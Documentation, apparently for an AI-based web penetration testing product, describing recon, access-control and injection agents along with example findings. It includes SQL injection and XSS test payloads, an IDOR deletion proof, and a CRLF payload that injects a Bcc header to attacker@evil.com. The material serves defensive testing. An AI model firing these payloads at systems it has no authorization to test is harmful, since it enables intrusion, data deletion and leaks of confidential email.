Web Testing Agents

Agent Overview

Agent	Focus Area	OWASP Specialization
Recon Agent	Discovery & mapping	Foundation for all testing
Access Control Agent	Authorization testing	A01 - Broken Access Control
Injection Agent	Input validation	A03 - Injection

Recon Agent

The Reconnaissance Agent is the foundation of every pentest. It maps your application to enable effective testing.

What It Does

Endpoint Discovery - Finds all accessible pages and routes
Technology Detection - Identifies frameworks, libraries, versions
Authentication Mapping - Understands login flows and session handling
Input Identification - Locates forms, parameters, and entry points
Architecture Understanding - Recognizes admin areas, user sections, APIs

How It Works

The Recon Agent takes your application URL and produces a comprehensive Application Map:

Endpoints — All discovered pages and routes (typically 20-100+)
Technologies — Frameworks, libraries, and versions detected
Authentication flows — Login mechanisms and session handling
Forms and parameters — All user input points
Testing plan — Prioritized targets for other agents

Output

The Recon Agent produces a comprehensive map used by all other agents:

List of endpoints to test
Technology-specific considerations
Authentication tokens and flows
Priority targets based on risk

Access Control Agent

Tests for authorization vulnerabilities—the #1 most common web application security risk.

What It Tests

OWASP A01 - Broken Access Control (34% of applications)

Vulnerability	Description
IDOR	Accessing other users' data via predictable references
Horizontal Privilege Escalation	User A accessing User B's resources
Vertical Privilege Escalation	Regular user accessing admin functions
Forced Browsing	Accessing unauthorized pages directly
Missing Authorization	Endpoints without access checks

Testing Methodology

Identify Object References - Find IDs, UUIDs, and other references
Baseline Collection - Document legitimate access patterns
Cross-User Testing - Attempt access with different credentials
Privilege Testing - Try escalating to higher permission levels
Authorization Bypass - Test various bypass techniques

Example Finding

❌ Critical: Unauthorized Cross-Organization Domain Deletion (IDOR)

Endpoint: DELETE /api/domains/:id
Parameter: id
CWE: CWE-639 (Authorization Bypass Through User-Controlled Key)
OWASP: A01:2021-Broken Access Control

Issue: The DELETE endpoint does not verify the authenticated user
       owns the domain or belongs to the same organization.

Evidence - Authorization Comparison:
-  GET /api/domains/:id  → 403 Forbidden (Protected ✓)
-  DELETE /api/domains/:id → 200 OK (VULNERABLE ✗)

Exploitation Proof:
- Attacker: bob@acme.com (Org: ACME Corp)
- Victim: admin@techstart.com (Org: TechStart Inc)
- Result: Attacker successfully deleted victim's domain
- Verification: GET by victim returned {"error":"Domain not found"}

Impact:
- Multi-tenant isolation breach
- Cross-organization data deletion
- Service disruption for victims
- Compliance violations (GDPR/CCPA)

Injection Agent

Tests for injection vulnerabilities—malicious data sent to interpreters.

What It Tests

OWASP A03 - Injection (18% of applications)

Vulnerability	Description
SQL Injection	Database query manipulation
Cross-Site Scripting (XSS)	Script injection into web pages
Command Injection	OS command execution
Server-Side Template Injection	Template engine exploitation
NoSQL Injection	Document database manipulation
XML External Entity (XXE)	XML parser exploitation

Testing Methodology

For each input parameter discovered by Recon:

Identify injection points - Forms, URL params, headers, JSON
Determine context - SQL, HTML, OS command, template
Send test payloads - Technology-appropriate inputs
Analyze responses - Errors, behavior changes, timing
Validate findings - Confirm exploitability

SQL Injection Testing

Input: search?q=test

Test payloads:
- test'           → SQL error indicates vulnerability
- test' OR '1'='1 → Behavior change indicates vulnerability
- test'; WAITFOR DELAY '0:0:5'-- → Time delay indicates blind SQLi

XSS Testing

Input: comment field

Test payloads (context-aware):
- HTML: <script>alert(1)</script>
- Attribute: " onclick="alert(1)"
- JavaScript: ';alert(1)//

Example Finding

❌ High: CRLF Injection Enables Email Header Manipulation

Endpoint: POST /api/emails
Parameter: subject
CWE: CWE-93 (CRLF Injection)
OWASP: A03:2021-Injection

Issue: The email subject field accepts CRLF characters (\r\n),
       allowing injection of arbitrary email headers.

Payload:
  subject: "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com"

Injected Headers Confirmed:
- Bcc: attacker@evil.com (blind copy to attacker)
- Reply-To: phishing@evil.com (redirects replies)
- X-Priority: 1 (marks as urgent)
- Content-Type: text/html; charset=UTF-7

Response:
  {"id":"438356f2-...", "subject":"Confidential\r\nBcc: attacker@evil.com...", "status":"sent"}

Persistence: CRLF characters stored in database and returned in GET responses

Impact:
- Leak confidential emails via Bcc injection
- Phishing attacks via Reply-To manipulation
- Bypass email security filters
- Affects all users sending through the platform

Parallel Execution

After Recon completes, specialized agents run simultaneously on different endpoint groups:

Agent	Target Endpoints	Focus
Access Control Agent	`/users/`, `/orders/`, `/admin/*`	Authorization bypass, IDOR
Injection Agent	`/search`, `/api/*`, forms	SQL injection, XSS, command injection

All findings then flow into the Consolidation phase for deduplication and validation.

Findings Consolidation

After all agents complete:

Deduplication - Same vulnerability found by multiple agents? Merged.
Validation - Each finding confirmed for accuracy
Severity Assessment - Real-world risk evaluated
Remediation - Fix guidance tailored to your stack

Next Steps

Last updated: February 1, 2026

On this page